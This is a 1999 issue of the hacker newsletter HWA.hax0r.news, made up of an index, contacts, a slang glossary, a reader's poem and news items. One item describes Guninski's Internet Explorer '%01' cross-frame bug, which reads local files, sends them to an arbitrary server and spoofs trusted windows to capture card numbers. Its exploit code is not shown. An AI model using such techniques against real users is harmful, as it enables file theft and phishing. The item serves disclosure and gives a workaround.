Guninski's IE 4 file reading bug.

[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 11 Volume 1 1999 March 24th 99 ========================================================================== Anyone want to send in comments on the current site or ideas for a new site layout, please do so, i'm no html wizard and all my sites tend to end up looking pretty much the same, if you feel creative and want to put a demo site together or point me in the direction of a site layout you like please do so, i'm getting bored with the haphazard layout of the current site and could use some creative input on ideas for layout as its a bit crowded currently and only looks half decent in 1024x768 mode .... tnx - cruciphux@dok.org Synopsis -------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #11 =-----------------------------------------------------------------------= ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** *** *** *** please join to discuss or impart news on techno/phac scene *** *** stuff or just to hang out ... someone is usually around 24/7*** *** *** *** Note that the channel isn't there to entertain you its for *** *** you to talk to us and impart news, if you're looking for fun*** *** then do NOT join our channel try #wierdwigs or something... *** *** we're not #chatzone or #hack *** *** *** ******************************************************************* =-------------------------------------------------------------------------= Issue #11 =--------------------------------------------------------------------------= [ INDEX ] =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the editor.................................................. =--------------------------------------------------------------------------= 03.0 .. MSIE 5 is still susceptible to frame spoofing and other bugs..... 03.1 .. MSIE 5 problems carried over from earlier versions.............. 04.0 .. WintrasherGOLD................................................... 05.0 .. LDAP Buffer overflow............................................. 06.0 .. HP security bulletin: HPTerm exploit............................. 07.0 .. Eudora buffer overflow exploit................................... 08.0 .. Netscape SUSE crash exploit...................................... 09.0 .. Hotmail to fix potential security problem ....................... 10.0 .. NcFTPd Exploit (from Feb but missed in earlier issues)........... 10.1 .. NcFTPd proxy exploitation....................................... 10.2 .. Mail.local sendmail exploit advisory............................ 11.0 .. Its in the bag, much ado about nothing .......................... 12.0 .. [ISN] DNS Spoofing finally resolved?............................. 13.0 .. [ISN] IETF working group seeks to improve security alerting .... 14.0 .. Report: Military computers vulnerable............................ 15.0 .. International raid cracks child porn ring ....................... 15.1 .. ACPM : Anti-Child Porn Militia wants YOU........................ 16.0 .. Hacking (Cracking) contest, win a Netfinity server!.............. 17.0 .. eBay owned....................................................... 18.0 .. Aussies to ban Net pr0n.......................................... 19.0 .. More on the ProMail email trojan program ........................ 20.0 .. C41 - Pentagon’s cyberdefenses criticized........................ 21.0 .. [ISN] NetBus 'Trojan' Splits Security Community.................. 22.0 .. [ISN] Cracking tools get smarter ................................ 23.0 .. [ISN] British Defense Ministry Dismisses Hacker Report........... 24.0 .. [ISN] Encryption key would lock up criminals..................... 25.0 .. [ISN] Crypto: Under lock and key ................................ 26.0 .. HRC's interview with Goat Security (IRC LOG)..................... 27.0 .. Year 2000 Network and Distributed System Security ............... 28.0 .. What would YOU do with Bill Gates' SSN?.......................... 29.0 .. MDT monitoring (Mobile Data Terminal as used by the Police)...... 30.0 .. Bugtraq: Lotus notes security advisory........................... 31.1 .. WU-FTPD REMOTE EXPLOIT Version wu-2.4.2-academ[BETA-18](1)....... 32.0 .. Bugtraq: OpenSSL and SSLeay Advisory............................. 33.0 .. OpenBSD security advisories...................................... 34.0 .. Oracle in insecure at initial install............................ 35.0 .. GnuPlot buffer overflow exploit ................................. =--------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. .......................................................................... HA.HA .. Humour and puzzles ............................................ HA.HA1 .. Humourous newsbytes from Innerpulse.com (www.innerpulse.com). .......................................................................... HOW.TO .. New section: "How to hack" by our illustrious editor part 2..... SITE.1 .. Featured site, http://www.real-secure.org/ with ezine excerpt... on IP Spoofing ................................................. .......................................................................... H.W .. Hacked Websites .............................................. A.0 .. APPENDICES...................................................... A.1 .. PHACVW linx and references...................................... =--------------------------------------------------------------------------= @HWA'99 "Heh heh heh heh heh,.why don't you listen to this recording with interest? Mary Mary, kill the hairy sonuvabitch...he he he and now for something completely different" - Wierdmix'90 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Has it occurred to anybody that "AOL for Dummies" is an extremely redundant name for a book? - unknown Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas72@usa.net @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. HiR:Hackers Information Report... http://axon.jccc.net/hir/ News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ ...............http://www.l0pht.com/ NewsTrolls (HNN)..................http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD ..............................http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+........................http://www.gammaforce.org/ News site+........................http://www.projectgamma.com/ +Various mailing lists and some newsgroups, such as ... +other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... * Yes demoniz is now officially retired, if you go to that site though the Bikkel web board (as of this writing) is STILL ACTIVE, www.hwa-iwa.org will also be hosting a webboard as soon as that site comes online perhaps you can visit it and check us out if I can get some decent wwwboard code running I don't really want to write my own, another alternative being considered is a telnet bbs that will be semi-open to all, you will be kept posted. - cruciphux http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq <+others> NEWS Agencies, News search engines etc: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/SEARCH/ http://www.foxnews.com/search/cgi-bin/search.cgi?query=cracker&days=0&wires=0&startwire=0 http://www.news.com/Searching/Results/1,18,1,00.html?querystr=cracker http://www.ottawacitizen.com/business/ http://search.yahoo.com.sg/search/news_sg?p=cracker http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=cracker http://www.zdnet.com/zdtv/cybercrime/ http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm http://freespeech.org/eua/ Electronic Underground Affiliation http://www.l0pht.com/cyberul.html http://www.hackernews.com/archive.html?122998.html http://ech0.cjb.net ech0 Security http://net-security.org Net Security ... Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe, visit http://www.counterpane.com/unsubform.html. Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of the International Association for Cryptologic Research, EPIC, and VTW. He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest Sun 14 Feb, 1999 Volume 11 : Issue 09 ISSN 1004-042X Editor: Jim Thomas (cudigest@sun.soci.niu.edu) News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu) Archivist: Brendan Kehoe Poof Reader: Etaion Shrdlu, Jr. Shadow-Archivists: Dan Carosone / Paul Southworth Ralph Sims / Jyrki Kuoppala Ian Dickinson Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed Subscribe: mail majordomo@repsec.com with "subscribe isn". @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/IRC+ man in black sas72@usa.net ............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ATTENTION: All foreign correspondants please check in or be removed by next issue I need your current emails since contact info was recently lost in a HD mishap and i'm not carrying any deadweight. Plus we need more people sending in info, my apologies for not getting back to you if you sent in January I lost it, please resend. N0Portz ..........................: Australia Qubik ............................: United Kingdom system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland And unofficially yet contributing too much to ignore ;) Spikeman .........................: World media Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site Contributors to this issue: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Spikeman .........................: daily news updates+ ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Can I see you naked?" - Bob Barker Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type wierd crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. Shouts to: * Kevin Mitnick * demoniz * The l0pht crew * tattooman * Dicentra * Pyra * Vexxation * FProphet * TwistedP * NeMstah * the readers * mj * Kokey * ypwitch * kimmie * tsal * spikeman * YOU. * #leetchans ppl, you know who you are... * all the people who sent in cool emails and support * our new 'staff' members. kewl sites: + http://www.freshmeat.net/ + http://www.slashdot.org/ + http://www.l0pht.com/ + http://www.2600.com/ + http://hacknews.bikkel.com/ (http://www.bikkel.com/~demoniz/) + http://www.legions.org/ + http://www.genocide2600.com/ + http://www.genocide2600.com/~spikeman/ + http://www.genocide2600.com/~tattooman/ + http://www.hackernews.com/ (Went online same time we started issue 1!) @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ Attrition has updated its archive of cracked sites with one of the biggest archives on the net http://www.attrition.org check it out ... Mucho thanks to Spikeman for directing his efforts to our cause of bringing you the news we want to read about in a timely manner ... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Yes we really do get a pile of mail in case you were wondering ;-0 heres a sampling of some of the mail we get here, the more interesting ones are included and of course we had to get in the plugs for the zine coz we love to receive those too *G* - Ed This is "off-topic" but its something I thought i'd share with the readers if you have any comments on the writing i'd like to hear them and so would phiregod so give us an email, we need more writers like this to bring a dose of reality to our lives now and then... - Cruciphux@dok.org From: "liquid phire" To: cruciphux@dok.org Subject: a new one Date: Tue, 23 Mar 1999 19:04:34 PST Mime-Version: 1.0 Content-type: text/plain when i watch tv all i see are commercials for heartburn stuffs, what is with that? are the subjects of american culture rotting from the inside out? did their bodies realize their sins before their minds did? is this happening with everyone? the world is going downhill fast, and we wont find out until we hit the bottom whether or not our air bags will work. this is a new car commercial, gaudy and loud, "buy or die!" they scream from their tabloid pulpits. our churches have turned into department stores, the very children that are our hope are selling their lives out for a dime bag and a place to stay. we dress in jail rags, chant the rants of the very people that are bringing this psuedo-life to its knees. athletes are yelling the rhymes of corporations at anyone who will listen. our heros are not fighting for equality or freedom, they are throwing hype out about cop killers and hits of coke. you cant eat money, you cant take it with you when you die, and it sure as hell wont stop a bullet. america is the prostitute of the free and imprisoned world, thousands died so we can enjoy cable from our matching houses with our matching lives. god is for those who are wasting their lives and need another one to spare. we fought for what now? so that rapists and murderers could walk free while political prisoners rotted in their cells? parents work all day so their children can attend public schools that promote insecurity and train the next generation to be faceless and money driven. the smart are encouraged to work for large companies or military services, the down of luck are pushed into low paying jobs and inferior lives. the country will prosper and a revolution will be breathing down our necks. i missed the sermon with the explanation, the end is near and the lord saves. mc donalds will cater the apocalypse, and nike will provide the offical shoe. god sold out to miramax for the film, tarantino has claimed the screenplay, and look out for the soundtrack by backstreet boys. salvation is being sold with an order of fries, healing comes with a free drink, faith by armani. the angels have encountered a glass ceiling, sexual harassment allegations in hell, the government has become "nightly action news". blood and gore, right and wrong, good and bad, pleasure and pain extremes are desired in a moderated world. the second coming will have its own line of clothes, the blood of the lamb is copyrighted. heaven and the inferno have merged and the NASDAQ is reaching all time highs. justice has been fucked over, her sword carried off and her measures used for heroin. the flag is used as a doormat in other countries, our anthem sung by drunk veterans in the middle of the night. this feels like a moment of revelation, but its just another day in Las Vegas. i wake up in the middle of the night screaming for solace, i cry for a calm sea and a worthy ship. like a panther truth runs through the sleeping city, merging with the gray and spreading over the streets in lies. we are grasping ever bit of cabbie wisdom we can find, slipping over the edge trying to hold on to religion, government, and "family". we have a thirst that encompasses our lives, and it can only be quenched with blood. "i am the alpha and the omega, the begining and the end." i dont remember if it was jesus or bill gates that said that. please excuse all grammer/spelling mistakes. phiregod liquidphire@hotmail.com www.geocities.com/siliconvalley/sector/4121 Get Your Private, Free Email at http://www.hotmail.com ================================================================ @HWA 02.0 From the editor.#9 ~~~~~~~~~~~~~~~~~~ #include #include #include main() { printf ("Read commented source!\n\n"); /* *So Mircosoft continues to suck, the released IE5 (wooHOO) *and whaddya know it still has a slew of bugs duh...all those *frame spewfing bugs and other java monsters are still in there *so I hope u guys that keep hitting the site with MSIE will *begin to smarten up and see that Netscape although not the *most secure program either is a damn sight better than MSIE *even on a bad day ... peace out rockin with issue 11 * */ printf ("EoF.\n"); } Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. @HWA 03.0 MSIE 5 is still susceptible to frame spoofing and other bugs ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Fri, 19 Mar 1999 11:46:01 +0100 From: Most Psychoid To: BUGTRAQ@netspace.org Subject: IE5 - same vulnerabilities, only some fixed Hello, The new Microsoft Internet Explorer 5 (I checked Version: 5.00.0910.1309) still allows Frame Spoofing and reading of local Files as described by Georgi Guninski (see http://www.whitehats.com/guninski/read.html). Another new feature named "AutoComplete" stores entries (which also may be passwords). Just another new source for passwords which had not been saved in IE 4.x. The Crash-bugs seem to be removed. I could not crash my default installed IE 5 using the known exploits. So far, psychoid --- Sent through Global Message Exchange - http://www.gmx.net 03.1 MSIE 5 problems carried over from earlier versions ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ There is a Javascript security bug in Internet Explorer 4.x (patched), which circumvents "Cross-frame security" and opens several security holes. The problem is: if you add '%01someURL' after an 'about:somecode' URL, IE thinks that the document is loaded from the domain of 'someURL'. Very strange? Some of the bugs are: 1) IE allows reading local files and sending them to an arbitrary server. The filename must be known. The bug may be exploited using HTML mail message. Demo is available (See Demos below) 2) IE allows "window spoofing". After visiting a hostile page (or clicking a hostile link) a window is opened and its location is a trusted site. However, the content of the window is not that of the original site, but it is supplied by the owner of the page. So, the user is misled he is browising a trusted site, while he is browsing a hostile page and may provide sensitive information, such as credit card number. The bug may be exploited using HTML mail message. Demo is available (See below) 3) Reading AUTOEXEC.BAT using TDC. Demo is available: (See below) Workaround: Disable Javascript Demo #1 Guninski's IE 4 file reading bug. There is a bug in Internet Explorer 4.x (patched) which allows reading local files and sending them to an arbitrary server.
The problem is: if you add '%01someURL' after the URL, IE thinks that the document is loaded from the domain of 'someURL'.
This circumvents "Cross-frame security" and opens several security holes.
The filename must be known.
The bug may be exploited using HTML mail message. The exploit uses Javascript. For more info see the source.
Workaround: Disable Javascript.
Go to Georgi Guninski's home page. Demo #2 Guninski's IE 4 window spoofing. There is a bug in Internet Explorer 4.x (patched) which allows "window spoofing".
The problem is: if you add '%01someURL' after the URL, IE thinks that the document is loaded from the domain of 'someURL'.
This circumvents "Cross-frame security" and opens several security holes.

After visiting a hostile page (or clicking a hostile link) a window is opened and its location is a trusted site. However, the content of the window is not that of the original site, but it is supplied by the owner of the page. So, the user is mislead he is browising a trusted site, while he is browsing a hostile page and may provide sensitive information, such as credit card number.
The bug may be exploited using HTML mail message. The exploit uses Javascript.
Workaround: Disable Javascript.
Go to Georgi Guninski's home page. Demo #3 Guninski's IE 4 reading AUTOEXEC.BAT. There is a bug in Internet Explorer 4.x (patched) which allows reading local files and sending them to an arbitrary server.
The problem is: if you add '%01someURL' after the an about: URL, IE thinks that the document is loaded from the domain of 'someURL'.
This circumvents "Cross-frame security" and opens several security holes.
This will try to read C:\AUTOEXEC.BAT using TDC.
The bug may be exploited using HTML mail message. The exploit uses Javascript. For more info see the source.

Workaround: Disable Javascript.
Go to Georgi Guninski's home page. This was reported in an earlier version and last issue of the zine but is included here for new readers whom may be unaware or have not read the earlier issues. - Ed 04.0 Wintrasher GOLD ~~~~~~~~~~~~~~~ This program bears some looking at, when I first saw it on packetstorm I thought the same thing i thought when I first heard of Genius's release and thats pure scepticism, anyways I checked it out and its pretty damn cool you might want to check it out too, 1.6M heres the blurb from packetstorm: Wintrasher GOLD v5.2 - Wintrasher is a powerful utility that can be ussed to configure hidden Windows settings, acting as a Windows Shell and Desktop Management Tool. Many of the settings that change the way Windows works and looks are hidden in the overwhelming registry, or in configuration files. WT-GOLD gives you an easy way to configure those settings. This version also includes, backup of critical system files, improved active desktop-calendar, popup-reminder, and much much more. Features: Get you computer to start in pure DOS again. Change the shortcut arrow to whatever you want. Check your files for changes at startup, and prevent infection by unknown viruses. Log file editor, to View/Edit/Clear all your Windows log files from one program. (improved from the PRO version). Personalize your Desktop pictures. Change the Windows 9x folder structure. Watch what 